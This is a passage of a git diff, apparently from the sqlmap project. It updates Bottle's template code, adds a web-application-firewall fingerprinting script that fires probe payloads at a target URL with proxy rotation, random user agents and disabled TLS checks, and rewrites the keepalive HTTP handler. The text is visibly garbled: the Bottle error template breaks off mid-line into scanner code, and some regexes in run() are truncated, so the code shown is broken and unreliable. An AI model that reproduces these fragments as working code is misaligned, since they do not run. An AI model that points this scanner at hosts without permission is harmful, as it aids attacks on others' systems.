len(text): + prefix = text[pos:] + lines = prefix.splitlines(True) + if lines[-1].endswith('\\\\\n'): lines[-1] = lines[-1][:-3] + elif lines[-1].endswith('\\\\\r\n'): lines[-1] = lines[-1][:-4] + parts.append(nl.join(map(repr, lines))) + code = '_printlist((%s,))' % ', '.join(parts) + self.lineno += code.count('\n') + 1 + self.write_code(code) + + @staticmethod + def process_inline(chunk): + if chunk[0] == '!': return '_str(%s)' % chunk[1:] + return '_escape(%s)' % chunk + + def write_code(self, line, comment=''): + code = ' ' * (self.indent + self.indent_mod) + code += line.lstrip() + comment + '\n' + self.code_buffer.append(code) + + +def template(*args, **kwargs): + """ Get a rendered template as a string iterator. You can use a name, a filename or a template string as first parameter. Template rendering arguments can be passed as dictionaries or directly (as keyword arguments). - ''' + """ tpl = args[0] if args else None + for dictarg in args[1:]: + kwargs.update(dictarg) adapter = kwargs.pop('template_adapter', SimpleTemplate) lookup = kwargs.pop('template_lookup', TEMPLATE_PATH) tplid = (id(lookup), tpl) @@ -3117,17 +4494,17 @@ def template(*args, **kwargs): TEMPLATES[tplid] = adapter(name=tpl, lookup=lookup, **settings) if not TEMPLATES[tplid]: abort(500, 'Template (%s) not found' % tpl) - for dictarg in args[1:]: kwargs.update(dictarg) return TEMPLATES[tplid].render(kwargs) + mako_template = functools.partial(template, template_adapter=MakoTemplate) -cheetah_template = functools.partial(template, template_adapter=CheetahTemplate) +cheetah_template = functools.partial(template, + template_adapter=CheetahTemplate) jinja2_template = functools.partial(template, template_adapter=Jinja2Template) -simpletal_template = functools.partial(template, template_adapter=SimpleTALTemplate) def view(tpl_name, **defaults): - ''' Decorator: renders a template for a handler. + """ Decorator: renders a template for a handler. The handler can control its behavior like that: - return a dict of template vars to fill out the template @@ -3135,8 +4512,10 @@ def view(tpl_name, **defaults): process the template, but return the handler result as is. This includes returning a HTTPResponse(dict) to get, for instance, JSON with autojson or other castfilters. - ''' + """ + def decorator(func): + @functools.wraps(func) def wrapper(*args, **kwargs): result = func(*args, **kwargs) @@ -3145,50 +4524,48 @@ def wrapper(*args, **kwargs): tplvars.update(result) return template(tpl_name, **tplvars) elif result is None: - return template(tpl_name, defaults) + return template(tpl_name, **defaults) return result + return wrapper + return decorator + mako_view = functools.partial(view, template_adapter=MakoTemplate) cheetah_view = functools.partial(view, template_adapter=CheetahTemplate) jinja2_view = functools.partial(view, template_adapter=Jinja2Template) -simpletal_view = functools.partial(view, template_adapter=SimpleTALTemplate) - - - - - ############################################################################### # Constants and Globals ######################################################## ############################################################################### - TEMPLATE_PATH = ['./', './views/'] TEMPLATES = {} DEBUG = False -NORUN = False # If set, run() does nothing. Used by load_app() +NORUN = False # If set, run() does nothing. Used by load_app() #: A dict to map HTTP status codes (e.g. 404) to phrases (e.g. 'Not Found') -HTTP_CODES = httplib.responses -HTTP_CODES[418] = "I'm a teapot" # RFC 2324 +HTTP_CODES = httplib.responses.copy() +HTTP_CODES[418] = "I'm a teapot" # RFC 2324 HTTP_CODES[428] = "Precondition Required" HTTP_CODES[429] = "Too Many Requests" HTTP_CODES[431] = "Request Header Fields Too Large" +HTTP_CODES[451] = "Unavailable For Legal Reasons" # RFC 7725 HTTP_CODES[511] = "Network Authentication Required" -_HTTP_STATUS_LINES = dict((k, '%d %s'%(k,v)) for (k,v) in HTTP_CODES.items()) +_HTTP_STATUS_LINES = dict((k, '%d %s' % (k, v)) + for (k, v) in HTTP_CODES.items()) #: The default template used for error pages. Override with @error() ERROR_PAGE_TEMPLATE = """ %%try: - %%from %s import DEBUG, HTTP_CODES, request, touni + %%from %s import DEBUG, request <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: {{e.status}} |<[^>]+>|\s+", " ", retval[HTML]) + match = re.search(r"(?im)^Server: (.+)", retval[RAW]) + retval[SERVER] = match.group(1).strip() if match else "" + return retval + +def calc_hash(value, binary=True): + value = value.encode("utf8") if not isinstance(value, bytes) else value + result = zlib.crc32(value) & 0xffff + if binary: + result = struct.pack(">H", result) + return result + +def single_print(message): + if message not in seen: + print(message) + seen.add(message) + +def check_payload(payload, protection_regex=GENERIC_PROTECTION_REGEX % '|'.join(GENERIC_PROTECTION_KEYWORDS)): + global chained + global heuristic + global intrusive + global locked_code + global locked_regex + + time.sleep(options.delay or 0) + if options.post: + _ = "%s=%s" % ("".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(options.url, _) + else: + _ = "%s%s%s=%s" % (options.url, '?' if '?' not in options.url else '&', "".join(random.sample(string.ascii_letters, 3)), quote(payload)) + intrusive = retrieve(_) + + if options.lock and not payload.isdigit(): + if payload == HEURISTIC_PAYLOAD: + match = re.search(re.sub(r"Server:|Protected by", "".join(random.sample(string.ascii_letters, 6)), WAF_RECOGNITION_REGEX, flags=re.I), intrusive[RAW] or "") + if match: + result = True + + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + locked_regex = DATA_JSON["wafs"][waf]["regex"] + locked_code = intrusive[HTTPCODE] + break + else: + result = False + + if not result: + exit(colorize("[x] can't lock results to a non-blind match")) + else: + result = re.search(locked_regex, intrusive[RAW]) is not None and locked_code == intrusive[HTTPCODE] + elif options.string: + result = options.string in (intrusive[RAW] or "") + elif options.code: + result = options.code == intrusive[HTTPCODE] + else: + result = intrusive[HTTPCODE] != original[HTTPCODE] or (intrusive[HTTPCODE] != 200 and intrusive[TITLE] != original[TITLE]) or (re.search(protection_regex, intrusive[HTML]) is not None and re.search(protection_regex, original[HTML]) is None) or (difflib.SequenceMatcher(a=original[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD) + + if not payload.isdigit(): + if result: + if options.debug: + print("\r---%s" % (40 * ' ')) + print(payload) + print(intrusive[HTTPCODE], intrusive[RAW]) + print("---") + + if intrusive[SERVER]: + servers.add(re.sub(r"\s*\(.+\)\Z", "", intrusive[SERVER])) + if len(servers) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP 'Server' headers detected (%s)" % ', '.join("'%s'" % _ for _ in sorted(servers)))) + + if intrusive[HTTPCODE]: + codes.add(intrusive[HTTPCODE]) + if len(codes) > 1: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTTP codes detected (%s)" % ', '.join("%s" % _ for _ in sorted(codes)))) + + if heuristic and heuristic[HTML] and intrusive[HTML] and difflib.SequenceMatcher(a=heuristic[HTML] or "", b=intrusive[HTML] or "").quick_ratio() < QUICK_RATIO_THRESHOLD: + chained = True + single_print(colorize("[!] multiple (reactive) rejection HTML responses detected")) + + if payload == HEURISTIC_PAYLOAD: + heuristic = intrusive + + return result + +def colorize(message): + if COLORIZE: + message = re.sub(r"\[(.)\]", lambda match: "[%s%s\033[00;49m]" % (LEVEL_COLORS[match.group(1)], match.group(1)), message) + + if any(_ in message for _ in ("rejected summary", "challenge detected")): + for match in re.finditer(r"[^\w]'([^)]+)'" if "rejected summary" in message else r"\('(.+)'\)", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): + message = message.replace("'%s'" % match.group(1), "'\033[37m%s\033[00;49m'" % match.group(1), 1) + + if "blind match" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (92 if int(match.group(2)) >= 95 else (93 if int(match.group(2)) > 80 else 90), match.group(1))) + + if "hardness" in message: + for match in re.finditer(r"\(((\d+)%)\)", message): + message = message.replace(match.group(1), "\033[%dm%s\033[00;49m" % (95 if " insane " in message else (91 if " hard " in message else (93 if " moderate " in message else 92)), match.group(1))) + + return message + +def parse_args(): + global options + + parser = optparse.OptionParser(version=VERSION) + parser.add_option("--delay", dest="delay", type=int, help="Delay (sec) between tests (default: 0)") + parser.add_option("--timeout", dest="timeout", type=int, help="Response timeout (sec) (default: 10)") + parser.add_option("--proxy", dest="proxy", help="HTTP proxy address (e.g. \"http://127.0.0.1:8080\")") + parser.add_option("--proxy-file", dest="proxy_file", help="Load (rotating) HTTP(s) proxy list from a file") + parser.add_option("--random-agent", dest="random_agent", action="store_true", help="Use random HTTP User-Agent header value") + parser.add_option("--code", dest="code", type=int, help="Expected HTTP code in rejected responses") + parser.add_option("--string", dest="string", help="Expected string in rejected responses") + parser.add_option("--post", dest="post", action="store_true", help="Use POST body for sending payloads") + parser.add_option("--debug", dest="debug", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--fast", dest="fast", action="store_true", help=optparse.SUPPRESS_HELP) + parser.add_option("--lock", dest="lock", action="store_true", help=optparse.SUPPRESS_HELP) + + # Dirty hack(s) for help message + def _(self, *args): + retval = parser.formatter._format_option_strings(*args) + if len(retval) > MAX_HELP_OPTION_LENGTH: + retval = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retval + return retval + + parser.usage = "python %s " % parser.usage + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + + for _ in ("-h", "--version"): + option = parser.get_option(_) + option.help = option.help.capitalize() + + try: + options, _ = parser.parse_args() + except SystemExit: + raise + + if len(sys.argv) > 1: + url = sys.argv[-1] + if not url.startswith("http"): + url = "http://%s" % url + options.url = url + else: + parser.print_help() + raise SystemExit + + for key in DEFAULTS: + if getattr(options, key, None) is None: + setattr(options, key, DEFAULTS[key]) + +def load_data(): + global WAF_RECOGNITION_REGEX + + if os.path.isfile(DATA_JSON_FILE): + with open(DATA_JSON_FILE, "r") as f: + DATA_JSON.update(json.load(f)) + + WAF_RECOGNITION_REGEX = "" + for waf in DATA_JSON["wafs"]: + if DATA_JSON["wafs"][waf]["regex"]: + WAF_RECOGNITION_REGEX += "%s|" % ("(?P%s)" % (waf, DATA_JSON["wafs"][waf]["regex"])) + for signature in DATA_JSON["wafs"][waf]["signatures"]: + SIGNATURES[signature] = waf + WAF_RECOGNITION_REGEX = WAF_RECOGNITION_REGEX.strip('|') + + flags = "".join(set(_ for _ in "".join(re.findall(r"\(\?(\w+)\)", WAF_RECOGNITION_REGEX)))) + WAF_RECOGNITION_REGEX = "(?%s)%s" % (flags, re.sub(r"\(\?\w+\)", "", WAF_RECOGNITION_REGEX)) # patch for "DeprecationWarning: Flags not at the start of the expression" in Python3.7 + else: + exit(colorize("[x] file '%s' is missing" % DATA_JSON_FILE)) + +def init(): + os.chdir(os.path.abspath(os.path.dirname(__file__))) + + # Reference: http://blog.mathieu-leplatre.info/python-utf-8-print-fails-when-redirecting-stdout.html + if not PY3 and not IS_TTY: + sys.stdout = codecs.getwriter(locale.getpreferredencoding())(sys.stdout) + + print(colorize("[o] initializing handlers...")) + + # Reference: https://stackoverflow.com/a/28052583 + if hasattr(ssl, "_create_unverified_context"): + ssl._create_default_https_context = ssl._create_unverified_context + + if options.proxy_file: + if os.path.isfile(options.proxy_file): + print(colorize("[o] loading proxy list...")) + + with open(options.proxy_file, "r") as f: + proxies.extend(re.sub(r"\s.*", "", _.strip()) for _ in f.read().strip().split('\n') if _.startswith("http")) + random.shuffle(proxies) + else: + exit(colorize("[x] file '%s' does not exist" % options.proxy_file)) + + + cookie_jar = CookieJar() + opener = build_opener(HTTPCookieProcessor(cookie_jar)) + install_opener(opener) + + if options.proxy: + opener = build_opener(ProxyHandler({"http": options.proxy, "https": options.proxy})) + install_opener(opener) + + if options.random_agent: + revision = random.randint(20, 64) + platform = random.sample(("X11; %s %s" % (random.sample(("Linux", "Ubuntu; Linux", "U; Linux", "U; OpenBSD", "U; FreeBSD"), 1)[0], random.sample(("amd64", "i586", "i686", "amd64"), 1)[0]), "Windows NT %s%s" % (random.sample(("5.0", "5.1", "5.2", "6.0", "6.1", "6.2", "6.3", "10.0"), 1)[0], random.sample(("", "; Win64", "; WOW64"), 1)[0]), "Macintosh; Intel Mac OS X 10.%s" % random.randint(1, 11)), 1)[0] + user_agent = "Mozilla/5.0 (%s; rv:%d.0) Gecko/20100101 Firefox/%d.0" % (platform, revision, revision) + HEADERS["User-Agent"] = user_agent + +def format_name(waf): + return "%s%s" % (DATA_JSON["wafs"][waf]["name"], (" (%s)" % DATA_JSON["wafs"][waf]["company"]) if DATA_JSON["wafs"][waf]["name"] != DATA_JSON["wafs"][waf]["company"] else "") + +def non_blind_check(raw, silent=False): + retval = False + match = re.search(WAF_RECOGNITION_REGEX, raw or "") + if match: + retval = True + for _ in match.groupdict(): + if match.group(_): + waf = re.sub(r"\Awaf_", "", _) + non_blind.add(waf) + if not silent: + single_print(colorize("[+] non-blind match: '%s'%s" % (format_name(waf), 20 * ' '))) + return retval + +def run(): + global original + + hostname = options.url.split("//")[-1].split('/')[0].split(':')[0] + + if not hostname.replace('.', "").isdigit(): + print(colorize("[i] checking hostname '%s'..." % hostname)) + try: + socket.getaddrinfo(hostname, None) + except socket.gaierror: + exit(colorize("[x] host '%s' does not exist" % hostname)) + + results = "" + signature = b"" + counter = 0 + original = retrieve(options.url) + + if 300 <= (original[HTTPCODE] or 0) < 400 and original[URL]: + original = retrieve(original[URL]) + + options.url = original[URL] + + if original[HTTPCODE] is None: + exit(colorize("[x] missing valid response")) + + if not any((options.string, options.code)) and original[HTTPCODE] >= 400: + non_blind_check(original[RAW]) + if options.debug: + print("\r---%s" % (40 * ' ')) + print(original[HTTPCODE], original[RAW]) + print("---") + exit(colorize("[x] access to host '%s' seems to be restricted%s" % (hostname, (" (%d: '%s')" % (original[HTTPCODE], original[TITLE].strip())) if original[TITLE] else ""))) + + challenge = None + if all(_ in original[HTML].lower() for _ in ("eval", "]*>(.*)", re.sub(r"(?is)", "", original[HTML])) + if re.search(r"(?i)<(body|div)", original[HTML]) is None or (match and len(match.group(1)) == 0): + challenge = re.search(r"(?is)", original[HTML]).group(0).replace("\n", "\\n") + print(colorize("[x] anti-robot JS challenge detected ('%s%s')" % (challenge[:MAX_JS_CHALLENGE_SNAPLEN], "..." if len(challenge) > MAX_JS_CHALLENGE_SNAPLEN else ""))) + + protection_keywords = GENERIC_PROTECTION_KEYWORDS + protection_regex = GENERIC_PROTECTION_REGEX % '|'.join(keyword for keyword in protection_keywords if keyword not in original[HTML].lower()) + + print(colorize("[i] running basic heuristic test...")) + if not check_payload(HEURISTIC_PAYLOAD): + check = False + if options.url.startswith("https://"): + options.url = options.url.replace("https://", "http://") + check = check_payload(HEURISTIC_PAYLOAD) + if not check: + if non_blind_check(intrusive[RAW]): + exit(colorize("[x] unable to continue due to static responses%s" % (" (captcha)" if re.search(r"(?i)captcha", intrusive[RAW]) is not None else ""))) + elif challenge is None: + exit(colorize("[x] host '%s' does not seem to be protected" % hostname)) + else: + exit(colorize("[x] response not changing without JS challenge solved")) + + if options.fast and not non_blind: + exit(colorize("[x] fast exit because of missing non-blind match")) + + if not intrusive[HTTPCODE]: + print(colorize("[i] rejected summary: RST|DROP")) + else: + _ = "...".join(match.group(0) for match in re.finditer(GENERIC_ERROR_MESSAGE_REGEX, intrusive[HTML])).strip().replace(" ", " ") + print(colorize(("[i] rejected summary: %d ('%s%s')" % (intrusive[HTTPCODE], ("%s" % intrusive[TITLE]) if intrusive[TITLE] else "", "" if not _ or intrusive[HTTPCODE] < 400 else ("...%s" % _))).replace(" ('')", ""))) + + found = non_blind_check(intrusive[RAW] if intrusive[HTTPCODE] is not None else original[RAW]) + + if not found: + print(colorize("[-] non-blind match: -")) + + for item in DATA_JSON["payloads"]: + info, payload = item.split("::", 1) + counter += 1 + + if IS_TTY: + sys.stdout.write(colorize("\r[i] running payload tests... (%d/%d)\r" % (counter, len(DATA_JSON["payloads"])))) + sys.stdout.flush() + + if counter % VERIFY_OK_INTERVAL == 0: + for i in xrange(VERIFY_RETRY_TIMES): + if not check_payload(str(random.randint(1, 9)), protection_regex): + break + elif i == VERIFY_RETRY_TIMES - 1: + exit(colorize("[x] host '%s' seems to be misconfigured or rejecting benign requests%s" % (hostname, (" (%d: '%s')" % (intrusive[HTTPCODE], intrusive[TITLE].strip())) if intrusive[TITLE] else ""))) + else: + time.sleep(5) + + last = check_payload(payload, protection_regex) + non_blind_check(intrusive[RAW]) + signature += struct.pack(">H", ((calc_hash(payload, binary=False) << 1) | last) & 0xffff) + results += 'x' if last else '.' + + if last and info not in blocked: + blocked.append(info) + + _ = calc_hash(signature) + signature = "%s:%s" % (_.encode("hex") if not hasattr(_, "hex") else _.hex(), base64.b64encode(signature).decode("ascii")) + + print(colorize("%s[=] results: '%s'" % ("\n" if IS_TTY else "", results))) + + hardness = 100 * results.count('x') // len(results) + print(colorize("[=] hardness: %s (%d%%)" % ("insane" if hardness >= 80 else ("hard" if hardness >= 50 else ("moderate" if hardness >= 30 else "easy")), hardness))) + + if blocked: + print(colorize("[=] blocked categories: %s" % ", ".join(blocked))) + + if not results.strip('.') or not results.strip('x'): + print(colorize("[-] blind match: -")) + + if re.search(r"(?i)captcha", original[HTML]) is not None: + exit(colorize("[x] there seems to be an activated captcha")) + else: + print(colorize("[=] signature: '%s'" % signature)) + + if signature in SIGNATURES: + waf = SIGNATURES[signature] + print(colorize("[+] blind match: '%s' (100%%)" % format_name(waf))) + elif results.count('x') < MIN_MATCH_PARTIAL: + print(colorize("[-] blind match: -")) + else: + matches = {} + markers = set() + decoded = base64.b64decode(signature.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + markers.add(part) + + for candidate in SIGNATURES: + counter_y, counter_n = 0, 0 + decoded = base64.b64decode(candidate.split(':')[-1]) + for i in xrange(0, len(decoded), 2): + part = struct.unpack(">H", decoded[i: i + 2])[0] + if part in markers: + counter_y += 1 + elif any(_ in markers for _ in (part & ~1, part | 1)): + counter_n += 1 + result = int(round(100.0 * counter_y / (counter_y + counter_n))) + if SIGNATURES[candidate] in matches: + if result > matches[SIGNATURES[candidate]]: + matches[SIGNATURES[candidate]] = result + else: + matches[SIGNATURES[candidate]] = result + + if chained: + for _ in list(matches.keys()): + if matches[_] < 90: + del matches[_] + + if not matches: + print(colorize("[-] blind match: - ")) + print(colorize("[!] probably chained web protection systems")) + else: + matches = [(_[1], _[0]) for _ in matches.items()] + matches.sort(reverse=True) + + print(colorize("[+] blind match: %s" % ", ".join("'%s' (%d%%)" % (format_name(matches[i][1]), matches[i][0]) for i in xrange(min(len(matches), MAX_MATCHES) if matches[0][0] != 100 else 1)))) + + print() + +def main(): + if "--version" not in sys.argv: + print(BANNER) + + parse_args() + init() + run() + +load_data() + +if __name__ == "__main__": + try: + main() + except KeyboardInterrupt: + exit(colorize("\r[x] Ctrl-C pressed")) diff --git a/thirdparty/keepalive/keepalive.py b/thirdparty/keepalive/keepalive.py index 51a4c867099..2dda424e685 100644 --- a/thirdparty/keepalive/keepalive.py +++ b/thirdparty/keepalive/keepalive.py @@ -1,30 +1,40 @@ #!/usr/bin/env python +# -*- coding: utf-8 -*- + +# This library is free software; you can redistribute it and/or +# modify it under the terms of the GNU Lesser General Public +# License as published by the Free Software Foundation; either +# version 2.1 of the License, or (at your option) any later version. # -# Copyright 2002-2003 Michael D. Stenner -# -# This program is free software: you can redistribute it and/or modify it -# under the terms of the GNU Lesser General Public License as published -# by the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public License -# along with this program. If not, see . +# This library is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# Lesser General Public License for more details. # +# You should have received a copy of the GNU Lesser General Public +# License along with this library; if not, write to the +# Free Software Foundation, Inc., +# 59 Temple Place, Suite 330, +# Boston, MA 02111-1307 USA + +# This file was part of urlgrabber, a high-level cross-protocol url-grabber +# Copyright 2002-2004 Michael D. Stenner, Ryan Tomayko +# Copyright 2015 Sergio Fernández """An HTTP handler for urllib2 that supports HTTP 1.1 and keepalive. - import urllib2 - from keepalive import HTTPHandler - keepalive_handler = HTTPHandler() - opener = urllib2.build_opener(keepalive_handler) - urllib2.install_opener(opener) +>>> import urllib2 +>>> from keepalive import HTTPHandler +>>> keepalive_handler = HTTPHandler() +>>> opener = _urllib.request.build_opener(keepalive_handler) +>>> _urllib.request.install_opener(opener) +>>> +>>> fo = _urllib.request.urlopen('http://www.python.org') - fo = urllib2.urlopen('http://www.python.org') +If a connection to a given host is requested, and all of the existing +connections are still in use, another connection will be opened. If +the handler tries to use an existing connection but it fails in some +way, it will be closed and removed from the pool. To remove the handler, simply re-run build_opener with no arguments, and install that opener. @@ -37,9 +47,13 @@ close_all() open_connections() -Example: +NOTE: using the close_connection and close_all methods of the handler +should be done with care when using multiple threads. + * there is nothing that prevents another thread from creating new + connections immediately after connections are closed + * no checks are done to prevent in-use connections from being closed - keepalive_handler.close_all() +>>> keepalive_handler.close_all() EXTRA ATTRIBUTES AND METHODS @@ -55,162 +69,314 @@ If you want the best of both worlds, use this inside an AttributeError-catching try: - try: status = fo.status - except AttributeError: status = None + >>> try: status = fo.status + >>> except AttributeError: status = None Unfortunately, these are ONLY there if status == 200, so it's not easy to distinguish between non-200 responses. The reason is that urllib2 tries to do clever things with error codes 301, 302, 401, and 407, and it wraps the object upon return. - You can optionally set the module-level global HANDLE_ERRORS to 0, - in which case the handler will always return the object directly. - If you like the fancy handling of errors, don't do this. If you - prefer to see your error codes, then do. + For python versions earlier than 2.4, you can avoid this fancy error + handling by setting the module-level global HANDLE_ERRORS to zero. + You see, prior to 2.4, it's the HTTP Handler's job to determine what + to handle specially, and what to just pass up. HANDLE_ERRORS == 0 + means "pass everything up". In python 2.4, however, this job no + longer belongs to the HTTP Handler and is now done by a NEW handler, + HTTPErrorProcessor. Here's the bottom line: + + python version < 2.4 + HANDLE_ERRORS == 1 (default) pass up 200, treat the rest as + errors + HANDLE_ERRORS == 0 pass everything up, error processing is + left to the calling code + python version >= 2.4 + HANDLE_ERRORS == 1 pass up 200, treat the rest as errors + HANDLE_ERRORS == 0 (default) pass everything up, let the + other handlers (specifically, + HTTPErrorProcessor) decide what to do + + In practice, setting the variable either way makes little difference + in python 2.4, so for the most consistent behavior across versions, + you probably just want to use the defaults, which will give you + exceptions on errors. """ -from httplib import _CS_REQ_STARTED, _CS_REQ_SENT, _CS_IDLE, CannotSendHeader - -from lib.core.convert import unicodeencode -from lib.core.data import kb - -import threading -import urllib2 -import httplib -import socket - -VERSION = (0, 1) -#STRING_VERSION = '.'.join(map(str, VERSION)) -DEBUG = 0 -HANDLE_ERRORS = 1 -class HTTPHandler(urllib2.HTTPHandler): - def __init__(self): - self._connections = {} +from __future__ import print_function - def close_connection(self, host): - """close connection to - host is the host:port spec, as in 'www.cnn.com:8080' as passed in. - no error occurs if there is no connection to that host.""" - self._remove_connection(host, close=1) +try: + from thirdparty.six.moves import http_client as _http_client + from thirdparty.six.moves import range as _range + from thirdparty.six.moves import urllib as _urllib +except ImportError: + from six.moves import http_client as _http_client + from six.moves import range as _range + from six.moves import urllib as _urllib - def open_connections(self): - """return a list of connected hosts""" - retVal = [] - currentThread = threading.currentThread() - for name, host in self._connections.keys(): - if name == currentThread.getName(): - retVal.append(host) - return retVal +import socket +import threading - def close_all(self): - """close all open connections""" - for _, conn in self._connections.items(): - conn.close() - self._connections = {} +DEBUG = None - def _remove_connection(self, host, close=0): - key = self._get_connection_key(host) - if self._connections.has_key(key): - if close: self._connections[key].close() - del self._connections[key] +import sys +if sys.version_info < (2, 4): HANDLE_ERRORS = 1 +else: HANDLE_ERRORS = 0 - def _get_connection_key(self, host): - return (threading.currentThread().getName(), host) +class ConnectionManager: + """ + The connection manager must be able to: + * keep track of all existing + """ + def __init__(self): + self._lock = threading.Lock() + self._hostmap = {} # map hosts to a list of connections + self._connmap = {} # map connections to host + self._readymap = {} # map connection to ready state - def _start_connection(self, h, req): - h.clearheaders() + def add(self, host, connection, ready): + self._lock.acquire() try: - if req.has_data(): - data = req.get_data() - h.putrequest('POST', req.get_selector()) - if not req.headers.has_key('Content-type'): - req.headers['Content-type'] = 'application/x-www-form-urlencoded' - if not req.headers.has_key('Content-length'): - req.headers['Content-length'] = '%d' % len(data) + if host not in self._hostmap: self._hostmap[host] = [] + self._hostmap[host].append(connection) + self._connmap[connection] = host + self._readymap[connection] = ready + finally: + self._lock.release() + + def remove(self, connection): + self._lock.acquire() + try: + try: + host = self._connmap[connection] + except KeyError: + pass else: - h.putrequest(req.get_method() or 'GET', req.get_selector()) + del self._connmap[connection] + del self._readymap[connection] + self._hostmap[host].remove(connection) + if not self._hostmap[host]: del self._hostmap[host] + finally: + self._lock.release() + + def set_ready(self, connection, ready): + try: self._readymap[connection] = ready + except KeyError: pass + + def get_ready_conn(self, host): + conn = None + try: + self._lock.acquire() + if host in self._hostmap: + for c in self._hostmap[host]: + if self._readymap.get(c): + self._readymap[c] = 0 + conn = c + break + finally: + self._lock.release() + return conn + + def get_all(self, host=None): + if host: + return list(self._hostmap.get(host, [])) + else: + return dict(self._hostmap) - if not req.headers.has_key('Connection'): - req.headers['Connection'] = 'keep-alive' +class KeepAliveHandler: + def __init__(self): + self._cm = ConnectionManager() - for args in self.parent.addheaders: - h.putheader(*args) - for k, v in req.headers.items(): - h.putheader(k, v) - h.endheaders() - if req.has_data(): - h.send(data) - except socket.error, err: + #### Connection Management + def open_connections(self): + """return a list of connected hosts and the number of connections + to each. [('foo.com:80', 2), ('bar.org', 1)]""" + return [(host, len(li)) for (host, li) in self._cm.get_all().items()] + + def close_connection(self, host): + """close connection(s) to + host is the host:port spec, as in 'www.cnn.com:8080' as passed in. + no error occurs if there is no connection to that host.""" + for h in self._cm.get_all(host): + self._cm.remove(h) h.close() - raise urllib2.URLError(err) - def do_open(self, http_class, req): - h = None - host = req.get_host() + def close_all(self): + """close all open connections""" + for host, conns in self._cm.get_all().items(): + for h in conns: + self._cm.remove(h) + h.close() + + def _request_closed(self, request, host, connection): + """tells us that this request is now closed and the the + connection is ready for another request""" + self._cm.set_ready(connection, 1) + + def _remove_connection(self, host, connection, close=0): + if close: connection.close() + self._cm.remove(connection) + + #### Transaction Execution + def do_open(self, req): + host = req.host if not host: - raise urllib2.URLError('no host given') + raise _urllib.error.URLError('no host given') try: - need_new_connection = 1 - key = self._get_connection_key(host) - h = self._connections.get(key) - if not h is None: - try: - self._start_connection(h, req) - except: - r = None - else: - try: r = h.getresponse() - except httplib.ResponseNotReady, e: r = None - except httplib.BadStatusLine, e: r = None - - if r is None or r.version == 9: - # httplib falls back to assuming HTTP 0.9 if it gets a - # bad header back. This is most likely to happen if - # the socket has been closed by the server since we - # last used the connection. - if DEBUG: print "failed to re-use connection to %s" % host - h.close() - else: - if DEBUG: print "re-using connection to %s" % host - need_new_connection = 0 - if need_new_connection: - if DEBUG: print "creating new connection to %s" % host - h = http_class(host) - self._connections[key] = h - self._start_connection(h, req) + h = self._cm.get_ready_conn(host) + while h: + r = self._reuse_connection(h, req, host) + + # if this response is non-None, then it worked and we're + # done. Break out, skipping the else block. + if r: break + + # connection is bad - possibly closed by server + # discard it and ask for the next free connection + h.close() + self._cm.remove(h) + h = self._cm.get_ready_conn(host) + else: + # no (working) free connections were found. Create a new one. + h = self._get_connection(host) + if DEBUG: DEBUG.info("creating new connection to %s (%d)", + host, id(h)) + self._cm.add(host, h, 0) + self._start_transaction(h, req) r = h.getresponse() - except socket.error, err: - if h: h.close() - raise urllib2.URLError(err) + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if DEBUG: DEBUG.info("STATUS: %s, %s", r.status, r.reason) # if not a persistent connection, don't try to reuse it - if r.will_close: self._remove_connection(host) + if r.will_close: + if DEBUG: DEBUG.info('server will close connection, discarding') + self._cm.remove(h) - if DEBUG: - print "STATUS: %s, %s" % (r.status, r.reason) r._handler = self r._host = host r._url = req.get_full_url() + r._connection = h + r.code = r.status + r.headers = r.msg + r.msg = r.reason - #if r.status == 200 or not HANDLE_ERRORS: - #return r if r.status == 200 or not HANDLE_ERRORS: - # [speedplane] Must return an adinfourl object - resp = urllib2.addinfourl(r, r.msg, req.get_full_url()) - resp.code = r.status - resp.msg = r.reason - return resp; + return r + else: + return self.parent.error('http', req, r, + r.status, r.msg, r.headers) + + def _reuse_connection(self, h, req, host): + """start the transaction with a re-used connection + return a response object (r) upon success or None on failure. + This DOES not close or remove bad connections in cases where + it returns. However, if an unexpected exception occurs, it + will close and remove the connection before re-raising. + """ + try: + self._start_transaction(h, req) + r = h.getresponse() + # note: just because we got something back doesn't mean it + # worked. We'll check the version below, too. + except (socket.error, _http_client.HTTPException): + r = None + except: + # adding this block just in case we've missed + # something we will still raise the exception, but + # lets try and close the connection and remove it + # first. We previously got into a nasty loop + # where an exception was uncaught, and so the + # connection stayed open. On the next try, the + # same exception was raised, etc. The tradeoff is + # that it's now possible this call will raise + # a DIFFERENT exception + if DEBUG: DEBUG.error("unexpected exception - closing " + \ + "connection to %s (%d)", host, id(h)) + self._cm.remove(h) + h.close() + raise + + if r is None or r.version == 9: + # httplib falls back to assuming HTTP 0.9 if it gets a + # bad header back. This is most likely to happen if + # the socket has been closed by the server since we + # last used the connection. + if DEBUG: DEBUG.info("failed to re-use connection to %s (%d)", + host, id(h)) + r = None else: - r.code = r.status - return self.parent.error('http', req, r, r.status, r.reason, r.msg) + if DEBUG: DEBUG.info("re-using connection to %s (%d)", host, id(h)) - def http_open(self, req): - return self.do_open(HTTPConnection, req) + return r + + def _start_transaction(self, h, req): + try: + if req.data: + data = req.data + 